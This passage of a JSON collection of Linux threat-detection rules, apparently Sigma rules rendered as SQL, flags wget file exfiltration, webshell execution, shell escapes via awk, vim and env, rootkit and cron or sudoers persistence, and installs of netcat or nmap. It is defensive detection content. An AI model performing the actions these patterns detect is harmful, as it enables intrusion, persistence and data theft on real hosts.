        "rule": [
            "SELECT * FROM logs WHERE ((type = 'PATH' AND name IN ('/etc/lsb-release', '/etc/redhat-release', '/etc/issue')) OR (type = 'EXECVE' AND a0 IN ('uname', 'uptime', 'lsmod', 'hostname', 'env')) OR (type = 'EXECVE' AND a0 = 'grep' AND (a1 LIKE '%vbox%' ESCAPE '\\' OR a1 LIKE '%vm%' ESCAPE '\\' OR a1 LIKE '%xen%' ESCAPE '\\' OR a1 LIKE '%virtio%' ESCAPE '\\' OR a1 LIKE '%hv%' ESCAPE '\\')) OR (type = 'EXECVE' AND a0 = 'kmod' AND a1 = 'list'))"
        ],
        "filename": "lnx_auditd_system_info_discovery.yml"
    },
    {
        "title": "Data Exfiltration with Wget",
        "id": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc",
        "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n",
        "author": "Pawel Mazur",
        "tags": [
            "attack.exfiltration",
            "attack.t1048.003"
        ],
        "falsepositives": [
            "Legitimate usage of wget utility to post a file"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'wget' AND a1 LIKE '--post-file=%' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_data_exfil_wget.yml"
    },
    {
        "title": "Webshell Remote Command Execution",
        "id": "c0d3734d-330f-4a03-aae2-65dacc6a8222",
        "description": "Detects possible command execution by web application/web shell",
        "author": "Ilyas Ochkov, Beyu Denis, oscd.community",
        "tags": [
            "attack.persistence",
            "attack.t1505.003"
        ],
        "falsepositives": [
            "Admin activity",
            "Crazy web applications"
        ],
        "level": "critical",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'SYSCALL' AND syscall = 'execve' AND key LIKE 'detect\\_execve\\_www' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_web_rce.yml"
    },
    {
        "title": "Clipboard Collection of Image Data with Xclip Tool",
        "id": "f200dc3f-b219-425d-a17e-c38467364816",
        "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n",
        "author": "Pawel Mazur",
        "tags": [
            "attack.collection",
            "attack.t1115"
        ],
        "falsepositives": [
            "Legitimate usage of xclip tools"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'xclip' AND a1 IN ('-selection', '-sel') AND a2 IN ('clipboard', 'clip') AND a3 = '-t' AND a4 LIKE 'image/%' ESCAPE '\\' AND a5 = '-o')"
        ],
        "filename": "lnx_auditd_clipboard_image_collection.yml"
    },
    {
        "title": "Creation Of An User Account",
        "id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512",
        "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.",
        "author": "Marie Euler, Pawel Mazur",
        "tags": [
            "attack.t1136.001",
            "attack.persistence"
        ],
        "falsepositives": [
            "Admin activity"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((type = 'SYSCALL' AND exe LIKE '%/useradd' ESCAPE '\\') OR type LIKE 'ADD\\_USER' ESCAPE '\\')"
        ],
        "filename": "lnx_auditd_create_account.yml"
    },
    {
        "title": "Steganography Extract Files with Steghide",
        "id": "a5a827d9-1bbe-4952-9293-c59d897eb41b",
        "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.",
        "author": "Pawel Mazur",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (type = 'EXECVE' AND a0 = 'steghide' AND a1 = 'extract' AND a2 = '-sf' AND (a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.png' ESCAPE '\\'))"
        ],
        "filename": "lnx_auditd_steghide_extract_steganography.yml"
    },
    {
        "title": "Persistence Via Cron Files",
        "id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05",
        "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.",
        "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.persistence",
            "attack.t1053.003"
        ],
        "falsepositives": [
            "Any legitimate cron file."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((TargetFilename LIKE '/etc/cron.d/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.daily/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.hourly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.monthly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.weekly/%' ESCAPE '\\' OR TargetFilename LIKE '/var/spool/cron/crontabs/%' ESCAPE '\\') OR (TargetFilename LIKE '%/etc/cron.allow%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/cron.deny%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/crontab%' ESCAPE '\\'))"
        ],
        "filename": "file_event_lnx_persistence_cron_files.yml"
    },
    {
        "title": "Triple Cross eBPF Rootkit Default Persistence",
        "id": "1a2ea919-d11d-4d1e-8535-06cda13be20f",
        "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.persistence",
            "attack.defense-evasion",
            "attack.t1053.003"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE TargetFilename LIKE '%ebpfbackdoor' ESCAPE '\\'"
        ],
        "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml"
    },
    {
        "title": "Potentially Suspicious Shell Script Creation in Profile Folder",
        "id": "13f08f54-e705-4498-91fd-cce9d9cee9f1",
        "description": "Detects the creation of shell scripts under the \"profile.d\" path.",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.persistence"
        ],
        "falsepositives": [
            "Legitimate shell scripts in the \"profile.d\" directory could be common in your environment. Apply additional filter accordingly via \"image\", by adding specific filenames you \"trust\" or by correlating it with other events.",
            "Regular file creation during system update or software installation by the package manager"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (TargetFilename LIKE '%/etc/profile.d/%' ESCAPE '\\' AND (TargetFilename LIKE '%.csh' ESCAPE '\\' OR TargetFilename LIKE '%.sh' ESCAPE '\\'))"
        ],
        "filename": "file_event_lnx_susp_shell_script_under_profile_directory.yml"
    },
    {
        "title": "Wget Creating Files in Tmp Directory",
        "id": "35a05c60-9012-49b6-a11f-6bab741c9f74",
        "description": "Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.command-and-control",
            "attack.t1105"
        ],
        "falsepositives": [
            "Legitimate downloads of files in the tmp folder."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/wget' ESCAPE '\\' AND (TargetFilename LIKE '/tmp/%' ESCAPE '\\' OR TargetFilename LIKE '/var/tmp/%' ESCAPE '\\'))"
        ],
        "filename": "file_event_lnx_wget_download_file_in_tmp_dir.yml"
    },
    {
        "title": "Triple Cross eBPF Rootkit Default LockFile",
        "id": "c0239255-822c-4630-b7f1-35362bcb8f44",
        "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE TargetFilename = '/tmp/rootlog'"
        ],
        "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml"
    },
    {
        "title": "Persistence Via Sudoers Files",
        "id": "ddb26b76-4447-4807-871f-1b035b2bfa5d",
        "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.persistence",
            "attack.t1053.003"
        ],
        "falsepositives": [
            "Creation of legitimate files in sudoers.d folder part of administrator work"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE TargetFilename LIKE '/etc/sudoers.d/%' ESCAPE '\\'"
        ],
        "filename": "file_event_lnx_persistence_sudoers_files.yml"
    },
    {
        "title": "Linux Doas Conf File Creation",
        "id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681",
        "description": "Detects the creation of doas.conf file in linux host platform.",
        "author": "Sittikorn S, Teoderick Contreras",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1548"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE TargetFilename LIKE '%/etc/doas.conf' ESCAPE '\\'"
        ],
        "filename": "file_event_lnx_doas_conf_creation.yml"
    },
    {
        "title": "Suspicious Invocation of Shell via AWK - Linux",
        "id": "8c1a5675-cb85-452f-a298-b01b22a51856",
        "description": "Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\nThis behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/awk' ESCAPE '\\' OR Image LIKE '%/gawk' ESCAPE '\\' OR Image LIKE '%/mawk' ESCAPE '\\' OR Image LIKE '%/nawk' ESCAPE '\\') AND CommandLine LIKE '%BEGIN {system%' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_awk_shell_spawn.yml"
    },
    {
        "title": "Triple Cross eBPF Rootkit Install Commands",
        "id": "22236d75-d5a0-4287-bf06-c93b1770860f",
        "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1014"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '% tc %' ESCAPE '\\' AND CommandLine LIKE '% enp0s3 %' ESCAPE '\\' AND (CommandLine LIKE '% qdisc %' ESCAPE '\\' OR CommandLine LIKE '% filter %' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml"
    },
    {
        "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand",
        "id": "21541900-27a9-4454-9c4c-3f0a4240344a",
        "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
        "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.privilege-escalation",
            "attack.initial-access",
            "attack.execution",
            "attack.t1068",
            "attack.t1190",
            "attack.t1203"
        ],
        "falsepositives": [
            "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand."
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/bin/sh%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml"
    },
    {
        "title": "User Has Been Deleted Via Userdel",
        "id": "08f26069-6f80-474b-8d1f-d971c6fedea0",
        "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks",
        "author": "Tuan Le (NCSGroup)",
        "tags": [
            "attack.impact",
            "attack.t1531"
        ],
        "falsepositives": [
            "Legitimate administrator activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/userdel' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_userdel.yml"
    },
    {
        "title": "Install Root Certificate",
        "id": "78a80655-a51e-4669-bc6b-e9d206a462ee",
        "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1553.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/update-ca-certificates' ESCAPE '\\' OR Image LIKE '%/update-ca-trust' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_install_root_certificate.yml"
    },
    {
        "title": "Docker Container Discovery Via Dockerenv Listing",
        "id": "11701de9-d5a5-44aa-8238-84252f131895",
        "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "author": "Seth Hanford",
        "falsepositives": [
            "Legitimate system administrator usage of these commands",
            "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/dir' ESCAPE '\\' OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/ls' ESCAPE '\\' OR Image LIKE '%/stat' ESCAPE '\\' OR Image LIKE '%/test' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\') AND CommandLine LIKE '%.dockerenv' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_susp_dockerenv_recon.yml"
    },
    {
        "title": "Potential GobRAT File Discovery Via Grep",
        "id": "e34cfa0c-0a50-4210-9cb3-5632d08eb041",
        "description": "Detects the use of grep to discover specific files created by the GobRAT malware",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/grep' ESCAPE '\\' AND (CommandLine LIKE '%apached%' ESCAPE '\\' OR CommandLine LIKE '%frpc%' ESCAPE '\\' OR CommandLine LIKE '%sshd.sh%' ESCAPE '\\' OR CommandLine LIKE '%zone.arm%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml"
    },
    {
        "title": "Vim GTFOBin Abuse - Linux",
        "id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea",
        "description": "Detects the use of \"vim\" and it's siblings commands to execute a shell or proxy commands.\nSuch behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/rvim' ESCAPE '\\' OR Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/vimdiff' ESCAPE '\\') AND (CommandLine LIKE '% --cmd%' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\') AND (CommandLine LIKE '%:!/%' ESCAPE '\\' OR CommandLine LIKE '%:lua %' ESCAPE '\\' OR CommandLine LIKE '%:py %' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_vim_shell_execution.yml"
    },
    {
        "title": "Remove Immutable File Attribute",
        "id": "34979410-e4b5-4e5d-8cfb-389fdff05c12",
        "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1222.002"
        ],
        "falsepositives": [
            "Administrator interacting with immutable files (e.g. for instance backups)."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/chattr' ESCAPE '\\' AND CommandLine LIKE '% -i %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_chattr_immutable_removal.yml"
    },
    {
        "title": "Curl Usage on Linux",
        "id": "ea34fb97-e2c4-4afb-810f-785e4459b194",
        "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.command-and-control",
            "attack.t1105"
        ],
        "falsepositives": [
            "Scripts created by developers and admins",
            "Administrative activity"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/curl' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_curl_usage.yml"
    },
    {
        "title": "Suspicious Invocation of Shell via Rsync",
        "id": "297241f3-8108-4b3a-8c15-2dda9f844594",
        "description": "Detects the execution of a shell as sub process of \"rsync\" without the expected command line flag \"-e\" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\n",
        "author": "Florian Roth",
        "tags": [
            "attack.execution",
            "attack.t1059",
            "attack.t1203"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (((ParentImage LIKE '%/rsync' ESCAPE '\\' OR ParentImage LIKE '%/rsyncd' ESCAPE '\\') AND (Image LIKE '%/ash' ESCAPE '\\' OR Image LIKE '%/bash' ESCAPE '\\' OR Image LIKE '%/csh' ESCAPE '\\' OR Image LIKE '%/dash' ESCAPE '\\' OR Image LIKE '%/ksh' ESCAPE '\\' OR Image LIKE '%/sh' ESCAPE '\\' OR Image LIKE '%/tcsh' ESCAPE '\\' OR Image LIKE '%/zsh' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -e %' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_rsync_shell_spawn.yml"
    },
    {
        "title": "User Added To Root/Sudoers Group Using Usermod",
        "id": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73",
        "description": "Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups",
        "author": "TuanLe (GTSC)",
        "tags": [
            "attack.privilege-escalation",
            "attack.persistence"
        ],
        "falsepositives": [
            "Legitimate administrator activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/usermod' ESCAPE '\\' AND (CommandLine LIKE '%-aG root%' ESCAPE '\\' OR CommandLine LIKE '%-aG sudoers%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_usermod_susp_group.yml"
    },
    {
        "title": "Shell Invocation via Env Command - Linux",
        "id": "bed978f8-7f3a-432b-82c5-9286a9b3031a",
        "description": "Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Github operations such as ghe-backup"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/env' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_env_shell_invocation.yml"
    },
    {
        "title": "Group Has Been Deleted Via Groupdel",
        "id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84",
        "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks",
        "author": "Tuan Le (NCSGroup)",
        "tags": [
            "attack.impact",
            "attack.t1531"
        ],
        "falsepositives": [
            "Legitimate administrator activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/groupdel' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_groupdel.yml"
    },
    {
        "title": "Suspicious Java Children Processes",
        "id": "d292e0af-9a18-420c-9525-ec0ac3936892",
        "description": "Detects java process spawning suspicious children",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_java_children.yml"
    },
    {
        "title": "File and Directory Discovery - Linux",
        "id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72",
        "description": "Detects usage of system utilities such as \"find\", \"tree\", \"findmnt\", etc, to discover files, directories and network shares.\n",
        "author": "Daniil Yugoslavskiy, oscd.community, CheraghiMilad",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Legitimate activities"
        ],
        "level": "informational",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/file' ESCAPE '\\' AND CommandLine REGEXP '(.){200,}') OR (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '%-R%' ESCAPE '\\') OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/tree' ESCAPE '\\' OR Image LIKE '%/findmnt' ESCAPE '\\' OR Image LIKE '%/mlocate' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_file_and_directory_discovery.yml"
    },
    {
        "title": "Execution Of Script Located In Potentially Suspicious Directory",
        "id": "30bcce26-51c5-49f2-99c8-7b59e3af36c7",
        "description": "Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/bash' ESCAPE '\\' OR Image LIKE '%/csh' ESCAPE '\\' OR Image LIKE '%/dash' ESCAPE '\\' OR Image LIKE '%/fish' ESCAPE '\\' OR Image LIKE '%/ksh' ESCAPE '\\' OR Image LIKE '%/sh' ESCAPE '\\' OR Image LIKE '%/zsh' ESCAPE '\\') AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml"
    },
    {
        "title": "Print History File Contents",
        "id": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66",
        "description": "Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.reconnaissance",
            "attack.t1592.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_susp_history_recon.yml"
    },
    {
        "title": "System Information Discovery",
        "id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239",
        "description": "Detects system information discovery commands",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "informational",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/uname' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/uptime' ESCAPE '\\' OR Image LIKE '%/lspci' ESCAPE '\\' OR Image LIKE '%/dmidecode' ESCAPE '\\' OR Image LIKE '%/lscpu' ESCAPE '\\' OR Image LIKE '%/lsmod' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_system_info_discovery.yml"
    },
    {
        "title": "Linux Base64 Encoded Shebang In CLI",
        "id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff",
        "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1140"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%IyEvYmluL2Jhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Rhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3pza%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Zpc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3No%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_base64_shebang_cli.yml"
    },
    {
        "title": "Suspicious Package Installed - Linux",
        "id": "700fb7e8-2981-401c-8430-be58e189e741",
        "description": "Detects installation of suspicious packages using system installation utilities",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1553.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%install%' ESCAPE '\\') OR (Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%localinstall%' ESCAPE '\\' OR CommandLine LIKE '%install%' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--install%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\'))) AND (CommandLine LIKE '%nmap%' ESCAPE '\\' OR CommandLine LIKE '% nc%' ESCAPE '\\' OR CommandLine LIKE '%netcat%' ESCAPE '\\' OR CommandLine LIKE '%wireshark%' ESCAPE '\\' OR CommandLine LIKE '%tshark%' ESCAPE '\\' OR CommandLine LIKE '%openconnect%' ESCAPE '\\' OR CommandLine LIKE '%proxychains%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_install_suspicioua_packages.yml"
    },
    {
        "title": "Scheduled Cron Task/Job - Linux",
        "id": "6b14bac8-3e3a-4324-8109-42f0546a347f",
        "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.",
        "author": "Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.execution",
            "attack.persistence",
            "attack.privilege-escalation",
            "attack.t1053.003"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_schedule_task_job_cron.yml"
    },
    {
        "title": "Potential Container Discovery Via Inodes Listing",
        "id": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8",
        "description": "Detects listing of the inodes of the \"/\" directory to determine if the we are running inside of a container.",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "author": "Seth Hanford",
        "falsepositives": [
            "Legitimate system administrator usage of these commands",
            "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '% -%i%' ESCAPE '\\' AND CommandLine LIKE '% -%d%' ESCAPE '\\' AND CommandLine LIKE '% /' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_susp_inod_listing.yml"
    },
    {
